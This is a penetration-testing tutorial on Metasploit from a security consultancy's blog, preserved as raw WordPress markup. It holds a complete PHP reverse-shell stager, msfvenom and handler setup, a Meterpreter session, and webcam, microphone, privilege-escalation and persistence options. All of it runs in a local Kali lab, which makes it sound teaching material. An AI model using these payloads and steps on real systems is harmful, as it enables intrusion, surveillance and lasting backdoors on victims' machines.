![](\"https:\/\/varutra-1a3b6.kxcdn.com\/wp-content\/uploads\/2021\/11\/Penetration-Testing-Using-Metasploit-Framework-1024x535.png\" "\\"Penetration")
\nMetasploit Framework is a powerful open-source penetration testing framework. You get to know all the information about penetration testing, IDS signature, and software vulnerabilities. It allows the execution and development of the exploit code against a remote target tool. Metasploit is not illegal itself, but it depends on what you use it for.<\/p>\n
<\/p>\n
The module<\/strong> is a software application in the Metasploit framework that carries out tasks like exploiting and scanning and the targets.<\/p>\n They are the key components of the framework and are broken down into 7 types below:<\/p>\n Payloads<\/strong> are the simple scripts that are often used in module exploits<\/strong> by taking advantage of the system\u2019s vulnerabilities. Auxiliary<\/strong>\u00a0modules are the only modules that are not exploited. Several interesting features allow them to do more than just exploiting.<\/p>\n <\/p>\n Let\u2019s get started\u2026<\/strong><\/p>\n Updating the Metasploit is always a good idea. It is recommended to check this weekly.<\/p>\n Fig.1<\/strong><\/p>\n Launch the Metasploit console like this.<\/p>\n Fig.2<\/strong><\/p>\n You can always seek help in the console.<\/p>\n Fig.3<\/strong><\/p>\n You can search for modules based on your target.<\/p>\n msf6 > search cisco<\/strong><\/p>\n <\/p>\n Information gathering\u00a0<\/strong>is also an important task of ethical hacking and penetration testing. Several tools seamlessly integrate with Metasploit like Nmap. Let\u2019s test using Nmap.<\/p>\n Fig.4<\/strong><\/p>\n <\/p>\n Nmap<\/a>\u00a0allows you to scan a host to identify it and to find out the services it is providing. You have now an option to choose from the\u00a0Exploit Database<\/a>\u00a0or search for modules in\u00a0Metasploit<\/a> with this information. Scan your local Kali instance, check that it enabled the SSH server.<\/p>\n Fig.5<\/strong><\/p>\n <\/p>\n So, if you go for the \u201chelp\u00a0<command>\u201d option, for example, you type, \u201chelp search\u201d you will get many details regarding the use of the command. For example, you may not know that you can filter your searches as well which is explained in the help.<\/p>\n Fig.6<\/strong><\/p>\n <\/p>\n Let\u2019s try this\u2026<\/p>\n msf6 > search cve:2020 type:exploit platform:-linux ssh<\/p>\n Fig.7<\/strong><\/p>\n Let\u2019s look at how SSH exploits on the Linux 2020 platform work.<\/p>\n So, what does this actually do?<\/p>\n <\/p>\n msf6 > info exploit\/linux\/ssh\/ibm_drm_a3user<\/strong><\/p>\n Fig.8<\/strong><\/p>\n <\/p>\n Using the Kali Linux SSH server for this example. The next step is to tell Metasploit that the Kali Linux SSH server is used for this exploit.<\/p>\n <\/p>\n msf6 > use exploit\/linux\/ssh\/ibm_drm_a3user[*] No payload configured, defaulting to cmd\/unix\/interactmsf6 exploit(linux\/ssh\/ibm_drm_a3user) ><\/p>\n Now, configuring the options\u2026<\/p>\n Fig.9<\/strong><\/p>\n <\/p>\n Now, we set the various options using the \u201cset<\/strong>\u201d command.<\/p>\n msf6 exploit(linux\/ssh\/ibm_drm_a3user) > set RHOSTS localhost<\/strong>RHOSTS => localhost<\/p>\n Once the desired options are set, run \u201cexploit<\/strong>\u201d command.<\/p>\n msf6 exploit(linux\/ssh\/ibm_drm_a3user) > exploit<\/strong>[*] Exploiting target {:address=>”0.0.0.1″, :hostname=>”localhost”}\u00a0[*] 0.0.0.1:22 \u2013 Making an attempt to log in to the IBM Data Risk Manager appliance…<\/p>\n <\/p>\n In Metasploit, \u201csearch\u201d functionality is considered to be a powerful option, but you can also find other possible ways.<\/p>\n <\/p>\n There are two ways of finding this out. Firstly, run the \u201cbanner\u201d option again from the \u201cmsfconsole\u201d.<\/p>\n As you can see, there are 2144 exploits, 1142 auxiliary, 365 posts, 592 payloads, 45 encoders, 10 nops, and 8 evasions at the time.<\/p>\n <\/p>\n Or, go for the second option, i.e., to exit \u201cmsfconsole<\/strong>\u201d and look for \u201cmodules<\/strong>\u201d in the Metasploit framework directory.<\/p>\n Fig.10<\/strong><\/p>\n <\/p>\n Or, use maybe something more specific like \u201cfirefox<\/strong>\u201d exploits.<\/p>\n kali@kali)-[~]\u2514\u2500$ ls -l \/usr\/share\/metasploit-framework\/modules\/exploits\/firefox\/localtotal 4-rw-r–r– 1 kali root 1857 Jun 24 12:07 exec_shellcode.rb<\/p>\n <\/p>\n This way you have to use it in Metasploit.<\/p>\n Fig.11<\/strong><\/p>\n <\/p>\n msf6 > use exploit\/firefox\/local\/exec_shellcode<\/strong>[*] No payload configured, defaulting to linux\/aarch64\/meterpreter\/reverse_tcp\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 msf6 exploit(firefox\/local\/exec_shellcode) ><\/p>\n <\/p>\n An auxiliary is a non-exploit module in Metasploit which does not come with a payload, while exploits usually come with a payload. They are a feature of the framework, that allows them for multiple purposes other than exploitation. For example, let here is the Denial-of-Service (DoS) auxiliary.<\/p>\n Fig.12<\/strong><\/p>\n Fig.13<\/strong><\/p>\n <\/p>\n And maybe more specifically Cisco DoS modules?<\/p>\n Fig.14<\/strong><\/p>\n That IOS HTTP Percent module sounds interesting?<\/p>\n Thinking about how to exit a context.<\/p>\n msf6 auxiliary(dos\/cisco\/ios_http_percentpercent) > backmsf6 ><\/p>\n <\/p>\n Reverse shells can be quarantined and detected by the systems that have antivirus software installed in it. This should act as a warning to ensure that you keep your system(s) up to date and have virus scanner software. This is because:<\/p>\n <\/p>\n \u201cMeterpreter\u201d is an exploit which we are going to use.<\/p>\n msf6<\/strong> > <\/strong>search meterpreter<\/strong><\/p>\n <\/p>\n \u201cMeterpreter<\/strong>\u201d in Metasploit can create a number of platforms, that includesAvoid, Windows, Python, Apple iOS, FreeBSD, and more.<\/p>\n <\/p>\n Just to list a few\u2026<\/p>\n payload\/python\/meterpreter\/reverse_tcp <\/p>\n The Venom (msfvenom<\/strong>) documentation seems to use Windows as an example.<\/p>\n Fig.15<\/strong><\/p>\n <\/p>\n Let\u2019s try this out using Java.<\/p>\n <\/p>\n Fig.16<\/strong><\/p>\n <\/p>\n Or you can also choose another option like PHP.<\/p>\n Fig.17<\/strong><\/p>\n <\/p>\n In PHP, if you run Linux \u201ccat<\/strong>\u201d on the file and easily view the code it is creating in the exploit.<\/p>\n <\/p>\n \/*<?php \/**\/ error_reporting(0); $ip = ‘192.168.153.129’; $port = 4444; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp:\/\/{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();<\/p>\n <\/p>\n It won\u2019t be a good idea to run Java (runme.jar), PHP (runme.php), and Windows (payload.exe). It is to be run or installed on the victim\u2019s device.<\/p>\n \u00a0<\/strong><\/p>\n Now, configure and proceed with the reverse shell server.<\/p>\n msf6 > use exploit\/multi\/handler<\/strong>[*] Using configured payload generic\/shell_reverse_tcp\u00a0msf6 exploit(multi\/handler) > set payload java\/meterpreter\/reverse_tcp<\/strong>payload => java\/meterpreter\/reverse_tcp\u00a0msf6 exploit(multi\/handler) > show options<\/strong>\u00a0Module options (exploit\/multi\/handler):\u00a0\u00a0\u00a0 Name\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 —-\u00a0 —————\u00a0 ——–\u00a0 ———–\u00a0\u00a0Payload options (java\/meterpreter\/reverse_tcp):\u00a0\u00a0\u00a0 Name\u00a0\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 —-\u00a0\u00a0 —————\u00a0 ——–\u00a0 ———–\u00a0\u00a0 LHOST\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen address (an interface may be specified)\u00a0\u00a0 LPORT\u00a0 4444\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen port\u00a0\u00a0Exploit target:\u00a0\u00a0\u00a0 Id\u00a0 Name\u00a0\u00a0 —\u00a0 —-\u00a0\u00a0 0\u00a0\u00a0 Wildcard Target\u00a0msf6 exploit(multi\/handler) > set LHOST 192.168.153.129<\/strong>LHOST => 192.168.153.129\u00a0msf6 exploit(multi\/handler) > set LPORT 4444<\/strong>LPORT => 4444\u00a0msf6 exploit(multi\/handler) > show options<\/strong>\u00a0Module options (exploit\/multi\/handler):\u00a0\u00a0\u00a0 Name\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 —-\u00a0 —————\u00a0 ——–\u00a0 ———–\u00a0Payload options (java\/meterpreter\/reverse_tcp):\u00a0\u00a0\u00a0 Name\u00a0\u00a0 Current Setting\u00a0 Required\u00a0 Description\u00a0\u00a0 —-\u00a0\u00a0 —————\u00a0 ——–\u00a0 ———–\u00a0\u00a0 LHOST\u00a0 192.168.153.129\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen address (an interface may be specified)\u00a0\u00a0 LPORT\u00a0 4444\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen port\u00a0Exploit target:\u00a0\u00a0\u00a0 Id\u00a0 Name\u00a0\u00a0 —\u00a0 —-\u00a0\u00a0 0\u00a0\u00a0 Wildcard Target\u00a0msf6 exploit(multi\/handler) > exploit<\/strong>[*] Started reverse TCP handler on 192.168.153.129:4444<\/p>\n <\/p>\n So, what did we do here\u2026?<\/p>\n <\/p>\n In another terminal, you can see that Kali is listening on TCP 4444 now.<\/p>\n <\/p>\n kali@kali:~$ netstat -antup | grep :4444<\/strong> <\/p>\n Browse for the exploit in the home directory of Kali (runme.jar<\/strong>) and run it by giving it execute permissions.<\/p>\n <\/p>\n kali@kali:~$ chmod +x runme.jar <\/strong> You would expect to see \u201crunme.jar<\/strong>\u201d running right?<\/p>\n kali@kali:~$ ps aux | grep runme<\/strong> Seems like nothing happened right? Or did it?<\/p>\n kali@kali:~$ lsof -i :4444<\/strong> Then, check out the Metasploit console.<\/p>\n [*] Started reverse TCP handler on 192.168.1.2:4444 This is the crazy part\u2026<\/p>\n meterpreter > shell<\/strong> <\/p>\n Although prompt is not seen, you will have a shell back to the victim system and will locate the \u201crunme.jar<\/strong>\u201d file. Now, try creating a file or directory, and you will see it created on the victim system.<\/p>\n <\/p>\n You can terminate the shell by pressing Ctrl+C.<\/p>\n <\/p>\n Terminate channel 1? [y\/N]\u00a0 y<\/strong> Try to \u201cbackground\u201d the meterpreter session.<\/p>\n meterpreter > background<\/strong><\/p>\n The current sessions and re-access of any sessions can be shown as mentioned below.<\/p>\n msf6 exploit(multi\/handler) > show sessions<\/strong>Active sessions <\/p>\n Thinking about what a hacker can do with your system with reverse shell can give you nightmares. They can easily access your web camera, microphone, take access to your system and view your private files and much more. This is the reason why it is advised to open software from trustworthy sources and to ensure that your system is up-to-date with anti-virus installed in it.<\/p>\n <\/p>\n Here are just a few options\u2026<\/p>\n meterpreter > help<\/strong>Stdapi: Networking Commands <\/p>\n The list of options depends on what system you are accessing. If you are using the Kali Linux virtual machine, then the webcam options are missing, but if you were accessing a Windows host, for example, you would see them there.<\/p>\n <\/p>\n The exploit will run as the user that ran it. You will need to escalate your services to take full access to your system.<\/p>\n <\/p>\n In case, you are targeting Windows, you will have multiple options\u2026<\/p>\n msf6 exploit(multi\/handler) > use post\/windows\/escalate\/<\/strong> You could also seek permission from the victim to access the system.<\/p>\n msf6 exploit(multi\/handler) > use exploit\/windows\/local\/ask<\/strong><\/p>\n <\/p>\n Linux-based systems don\u2019t usually have \u201cfun<\/em>\u201d options. In case, Windows user is the target, you could have a gala time on their system.<\/p>\n <\/p>\n These reverse shells are not persistent. This means if the system reboots, it won\u2019t be running and you need to seek the victim\u2019s permission to run it again.<\/p>\n <\/p>\n meterpreter > run persistence -h<\/strong>[!] Meterpreter scripts are deprecated. Try exploit\/windows\/local\/persistence. As an example, for the system with Windows OS to reverse shell persistent, you have to run this.<\/p>\n meterpreter > run exploit\/windows\/local\/persistence OPTION=X<\/strong><\/p>\n <\/p>\n You can also browse our website to learn about other pentest<\/a> attacks like AWS Pentesting<\/a>, Port Forwarding<\/a> and more on our blog<\/a> section.<\/p>\n <\/p>\n Author,<\/p>\n Sachin Kumar<\/strong><\/p>\n Attack & Pentest Team,<\/p>\n Varutra Consulting<\/p>","protected":false},"excerpt":{"rendered":" Metasploit Framework is a powerful open-source penetration testing framework. You get to know all the information about penetration testing, IDS signature, and software vulnerabilities. It…<\/p>\n","protected":false},"author":4,"featured_media":17996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[261,278,274],"tags":[566,567,568,102],"aioseo_notices":[],"aioseo_head":"\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n
![\"Updating](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Updating-the-Metasploit-1.png\")
<\/p>\n![\"Launch](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Launch-the-Metasploit-console-2.png\")
<\/p>\n![\"help](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/help-in-the-console-3.png\")
<\/p>\n![\"Information](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Information-gathering-4.png\")
<\/p>\n![\"search](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/search-for-modules-in-Metasploit-5.png\")
<\/p>\nThis procedure is for \u201cssh\u201d alone. Now you will get results in Metasploit.<\/h3>\n
![\"Example\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Example-6.png\")
<\/p>\n![\"Exploit](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Exploit-Platform-7.png\")
<\/p>\n![\"SSH](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/SSH-exploits-on-the-Linux-2020-platform-work-8.png\")
<\/p>\nTime to exploit!<\/h3>\n
![\"configuring](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/configuring-the-options-9.png\")
<\/p>\nWhat other exploit modules are available?<\/strong><\/h3>\n
![\"msfconsole\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/1-1.png\")
<\/p>\n![\"Metasploit](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Metasploit-framework-directory-10.png\")
<\/p>\n![\"Metasploit\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Metasploit-11.png\")
<\/p>\nWhat non-exploit modules are available?<\/strong><\/h3>\n
![\"Denial-of-Service](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-12.png\")
<\/p>\n![\"Denial-of-Service](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Denial-of-Service-DoS-auxiliary-13.png\")
<\/p>\n![\"Cisco](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Cisco-DoS-modules-14.png\")
<\/p>\n![\"IOS](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/IOS-HTTP-Percent-module.png\")
<\/p>\nReverse Shell Client (\u201cVictim\u201d)<\/strong><\/h3>\n
\npayload\/android\/meterpreter\/reverse_tcp
\napple_ios\/aarch64\/meterpreter_reverse_tcp
\njava\/meterpreter\/reverse_tcp
\nlinux\/aarch64\/meterpreter_reverse_tcp
\nlinux\/armbe\/meterpreter_reverse_tcp
\nlinux\/mips64\/meterpreter_reverse_tcp
\nlinux\/mipsbe\/meterpreter_reverse_tcp
\nlinux\/mipsle\/meterpreter\/reverse_tcp
\nlinux\/mipsle\/meterpreter_reverse_tcp
\nlinux\/ppc\/meterpreter_reverse_tcp
\nlinux\/ppc64le\/meterpreter_reverse_tcp
\nlinux\/ppce500v2\/meterpreter_reverse_tcp
\nlinux\/x64\/meterpreter_reverse_tcp
\nlinux\/x86\/meterpreter_reverse_tcp
\nlinux\/zarch\/meterpreter_reverse_tcp
\nosx\/x64\/meterpreter_reverse_tcp
\nphp\/meterpreter_reverse_tcp
\npython\/meterpreter_reverse_tcp
\nwindows\/meterpreter_reverse_tcp
\nwindows\/x64\/meterpreter_reverse_tcp<\/p>\n![\"Venom\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Venom-15.png\")
<\/p>\n![\"Java\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/Java-16-1.png\")
<\/p>\n![\"PHP\"](\"https:\/\/www.varutra.com\/wp-content\/uploads\/2021\/11\/PHP-17.png\")
<\/p>\nReverse Shell Server (\u201cAttacker\u201d)<\/strong><\/h3>\n
\n
\n(Not all processes could be identified, non-owned process info
\nwill not be shown, you would have to be root to see it all.)
\ntcp\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0\u00a0\u00a0\u00a0\u00a0\u00a0 0 192.168.1.2:4444<\/strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0.0.0.0:*\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 LISTEN\u00a0\u00a0\u00a0\u00a0\u00a0 63774\/ruby<\/p>\n
\nkali@kali:~$ .\/runme.jar<\/strong>
\nkali@kali:~$<\/p>\n
\nkali\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 63963\u00a0 0.0\u00a0 0.0\u00a0\u00a0 6112\u00a0\u00a0 644 pts\/2\u00a0\u00a0\u00a0 S+\u00a0\u00a0 22:54\u00a0\u00a0 0:00 grep –color=auto runme<\/p>\n
\nCOMMAND\u00a0\u00a0 PID USER\u00a0\u00a0 FD\u00a0\u00a0 TYPE DEVICE SIZE\/OFF NODE NAME
\nruby\u00a0\u00a0\u00a0 63774 kali\u00a0\u00a0\u00a0 8u\u00a0 IPv4 170341\u00a0\u00a0\u00a0\u00a0\u00a0 0t0\u00a0 TCP 192.168.1.2:4444->192.168.1.2:56226 (ESTABLISHED)
\njava\u00a0\u00a0\u00a0 63940 kali\u00a0\u00a0\u00a0 7u\u00a0 IPv6 170614\u00a0\u00a0\u00a0\u00a0\u00a0 0t0\u00a0 TCP 192.168.1.2:56226->192.168.1.2:4444 (ESTABLISHED)<\/p>\n
\n[*] Sending stage (53944 bytes) to 192.168.1.2
\n[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56226) at 2020-10-15 22:53:28 +0100<\/strong>meterpreter ><\/p>\n
\nProcess 1 created.
\nChannel 1 created.ls -la ~\/runme.jar<\/strong>
\n-rwxr-xr-x 1 kali kali 5307 Oct 15 22:33 \/home\/kali\/runme.jar<\/p>\n
\nmeterpreter ><\/p>\n
\n===============Id\u00a0 Name\u00a0 Type\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Information\u00a0 Connection
\n—\u00a0 —-\u00a0 —-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–\u00a0 ———-
\n1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 meterpreter java\/linux\u00a0 kali @ kali\u00a0 192.168.1.2:4444 -> 192.168.1.2:56226 (192.168.1.2)msf5 exploit(multi\/handler) > sessions -i 1<\/strong>
\n[*] Starting interaction with 1…meterpreter ><\/p>\n
\n===========================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description
\n——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–
\nifconfig\u00a0\u00a0\u00a0\u00a0\u00a0 Display interfaces
\nipconfig\u00a0\u00a0\u00a0\u00a0\u00a0 Display interfaces
\nportfwd\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Forward a local port to a remote service
\nroute\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 View and modify the routing tableStdapi: System Commands
\n=======================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description
\n——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–
\nexecute\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Execute a command
\ngetenv\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Get one or more environment variable values
\ngetuid\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Get the user that the server is running as
\nlocaltime\u00a0\u00a0\u00a0\u00a0 Displays the target system’s local date and time
\npgrep\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filter processes by name
\nps\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 List running processes
\nshell\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Drop into a system command shell
\nsysinfo\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Gets information about the remote system, such as OSStdapi: User interface Commands
\n===============================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description
\n——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–
\nkeyevent\u00a0\u00a0\u00a0\u00a0\u00a0 Send key events
\nmouse\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Send mouse events
\nscreenshare\u00a0\u00a0 Watch the remote user’s desktop in real time
\nscreenshot\u00a0\u00a0\u00a0 Grab a screenshot of the interactive desktopStdapi: Webcam Commands
\n=======================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description
\n——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–
\nrecord_mic\u00a0\u00a0\u00a0 Record audio from the default microphone for X secondsStdapi: Audio Output Commands
\n=============================Command\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Description
\n——-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–
\nplay\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 play a waveform audio file (.wav) on the target system<\/p>\n
\nuse post\/windows\/escalate\/droplnk\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/golden_ticket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/screen_unlock
\nuse post\/windows\/escalate\/getsystem\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 use post\/windows\/escalate\/ms10_073_kbdlayout\u00a0 use post\/windows\/escalate\/unmarshal_cmd_exec<\/p>\n
\n[!] Example: run exploit\/windows\/local\/persistence OPTION=value […]
\nMeterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start a matching exploit\/multi\/handler to connect to the agent
\n-L <opt>\u00a0 Location in target host to write payload to, if none %TEMP% will be used.
\n-P <opt>\u00a0 Payload to use, default is windows\/meterpreter\/reverse_tcp.
\n-S\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent on boot as a service (with SYSTEM privileges)
\n-T <opt>\u00a0 Alternate executable template to use
\n-U\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent when the User logs on
\n-X\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Automatically start the agent when the system boots
\n-h\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 This help menu
\n-i <opt>\u00a0 The interval in seconds between each connection attempt
\n-p <opt>\u00a0 The port on which the system running Metasploit is listening
\n-r <opt>\u00a0 The IP of the system running Metasploit listening for the connect back<\/p>\n